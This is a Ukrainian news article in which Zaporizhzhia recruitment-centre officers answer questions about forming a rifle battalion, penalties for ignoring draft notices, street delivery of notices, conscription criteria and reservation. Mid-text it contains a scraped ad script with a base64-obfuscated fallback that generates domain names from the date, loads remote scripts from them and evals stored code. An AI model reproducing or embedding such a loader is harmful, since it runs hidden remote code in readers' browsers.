Жителям Запоріжжя роз’яснили особливості призову, бронювання й вручення повісток

У Запорізькій області прийнято рішення про формування в термін до 28 лютого 415 окремого стрілецького батальйону. В зв’язку з цим для жителів міста й області провели інформаційно-роз’яснювальні заходи щодо призову й бронювання.

Так, на питання журналістів відповіли заступник начальника ТЦК та СП з морально-психологічного забезпечення – начальник відділу морально-психологічного забезпечення та зв’язків з громадськістю підполковник Андрій Якунін і начальник відділу військового обліку, бронювання та провадження ЄДР військовозобов’язаних сектору мобілізаційно-оборонної роботи підполковник Андрій Гуренко. Нижче наведено питання й відповіді.

На якому етапі формування 415 окремого стрілецького батальйону?

Вже проводиться набір оргядра і особового складу. Він триватиме до 15 лютого. Близько 600 осіб буде набрано, з них 50 офіцерів. Особовий склад батальйону буде проходити як індивідуальну підготовку, так і бойове злагодження на території Запорізької області, де й передбачається його застосування.

Яка відповідальність настає для тих, хто не з’являється на облік в ТЦК?

Існує адміністративна й кримінальна відповідальність. Якщо людина не з’являється по повістці, то це є порушенням військовозобов’язаного правил обліку. Покаранням є штраф від 850 до 1700 гривень. Але якщо під час встановлення обставин неприбуття було з’ясовано, що метою було ухилення від проходження військової служби, то може наставати кримінальна відповідальність у вигляді позбавлення волі від 3 до 5 років. Якщо людина вже пройшла медичну комісію, але не з’явилася на відправку, то це в будь-якому випадку кримінальна відповідальність, окрім ситуацій, коли є поважні обставини. За їхньої наявності відправка буде перенесена на інший термін.

Коли військовозобов’язані мають самостійно прибувати до ТЦК?

Наприкінці 2022 року було ухвалено нову постанову Кабміну, згідно з якою всі військовозобов’язані повинні прибути до територіальних центрів (військоматів) за викликом або один раз на 5 років для звіряння даних за місцем перебування.

Підписувати повістку має право керівник як районного ТЦК, так і керівник сільської, селищної, міської ради, тобто органів самоврядування. Вручати повістки працівники районного ТЦК або виконавчі органи місцевої влади.

Також військовозобов’язані повинні в разі зміни місця проживання самостійно повідомляти про це ТЦК. Зокрема, ВПО повинні ставати на облік. У нас чомусь люди вважають, що поки не викликали, то йти не треба. Однак військовозобов’язані мають певні обов’язки. При переміщенні до іншого міста треба стати на облік у місцевому ТЦК протягом 7 діб. Це можна зробити навіть у випадку, якщо попередньо громадянин не знявся з обліку у іншому ТЦК.

Чимало людей вважають, що повістки на вулиці вручаються з порушеннями, бо вони не виписані воєнкомом на конкретну особу. Можете більш детально розповісти про процедуру вручення повістки з боку закону.

Конкретний порядок вручення повісток в повному обсязі не прописаний. Однак, по-перше, ми нічого не порушуємо. По-друге, на даний час є нагальна потреба вручення у громадських місцях повісток. Це робиться, тому що є багато громадян, які не прибувають з будь-яких причин до ТЦК, також у нас багато ВПО, які не стають на облік. Тому, на жаль, в нас є необхідність вручати повістки на вулицях. Якщо б усі чоловіки вчасно виконували зобов’язання, які передбачені постановою Кабміну, то такої б потреби не було. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Окрім цього, діє особливий період і введений воєнний стан. Тому є певні обмеження, які стосуються прав громадян. Я розумію, що права громадян це найголовніше, що захищає держава, але ж ми повинні розуміти, що важливіше зараз захистити саму державу, щоб вона взагалі існувала. Ті громадяни, які заважають роботі територіальних центрів можливо несвідомо працюють не на захист нашої держави. У нас немає мети нашкодити, а головне завдання — перемога. У зв’язку з тим, що у нас не вистачає інформації про перебування на обліку таких громадян, ми вимушені вручати повістки в громадських місцях.

Навіщо поліція супроводжує працівників ТЦК під час вручення повісток?

Що стосується поліції, то вона перебуває з працівниками ТЦК виключно для випадків недопущення порушення громадського порядку. Законом не заборонено вручати повістки на вулицях.

Кого в першу чергу призивають серед тих, хто вже стоїть на обліку? За якими критеріями?

Під час дії особливого періоду є граничний вік 60 років. Але в кожному випадку військовозобов’язаний розглядається окремо. Багато громадян, які є обмежено придатними. Вони можуть призиватися в якості небойового складу, однак заборони на призов таких громадян немає. Перевага надається особам, які мають бойовий досвід. Але чоловіки, що його не мають, направляються до учбовий підрозділів, проходять навчання, бойове злагодження. Тому до війська вони потрапляють, маючи підготовку. Таких випадків, щоб людину відправили з територіального центру на передову, у нас немає.

Багато особового складу розміщується на посаді стрілків, гранатометників, чи помічників. Це спеціальності, які не потребують специфічних знань і за час базової чи індивідуальної підготовки громадяни можуть швидко набути певних навичок. Більш специфічними є напрямок тилового забезпечення, фінансового, зв’язку. Наприклад, кухаря неможливо навчити за місяць чи за два, як і бухгалтера. Це специфічні спеціальності, які також потрібні, але не в таких обсягах. Стрілок — найрозповсюдженіша спеціальність.

Щодо обмежено придатних є безліч спеціальностей — діловодство, бухгалтер, це стосується людей з певною вищою освітою. Застосування на даний час знайдеться у війську всім.

Яким чином зараз діє бронювання?

Люди, які заброньовані державною владою, органами місцевого самоврядування, підприємствами, установами, організаціями, перебувають на спеціальному військовому обліку. Якщо така особа має посвідчення або витяг з наказу, то вона не підлягає призову. Ті особи, які критично необхідні для роботи підприємств, підлягають бронюванню. Також сюди відносяться представники державних органів, місцевого самоврядування, тому що під час воєнного стану вони виконують певні важливі функції. Але бронювання це тимчасове явище, середній час отримання відстрочки — півроку.

Стало відомо, кому не вручають повістки на вулицях Підписуйтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/zhitelyam-zaporizhzhya-roz-yasnili-osoblivosti-prizovu-bronyuvannya-j-vruchennya-povistok/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top